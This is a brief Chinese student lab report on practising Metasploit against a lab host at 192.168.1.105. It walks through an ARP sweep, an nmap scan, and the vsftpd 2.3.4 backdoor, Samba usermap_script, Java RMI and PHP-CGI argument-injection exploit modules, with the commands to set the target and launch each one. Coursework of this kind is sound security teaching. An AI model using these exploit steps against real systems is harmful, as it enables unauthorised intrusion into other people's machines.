20222328 《网络与系统攻防技术》实验六实验报告

一.实验内容：本实践目标是掌握metasploit的用法。

二.实验过程：

1.首先打开msf，并搜索arp相关的指令

接下来我们需要用到use auxiliary/scanner/discovery/arp_sweep这个指令

随后指定攻击的ip地址，并开始用nmap进行端口扫描

2.输入use exploit/unix/ftp/vsftpd_234_backdoor进行攻击，payload需要指定RHOSTS

接下来就能看到攻击成功

3.use exploit/multi/samba/usermap_script
set RHOST 192.168.1.105
exploit

利用成功 执行uname–a验证

4.use exploit/multi/misc/java_rmi_server，随后用options查看需要设置什么东西

5.use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.1.105
exploit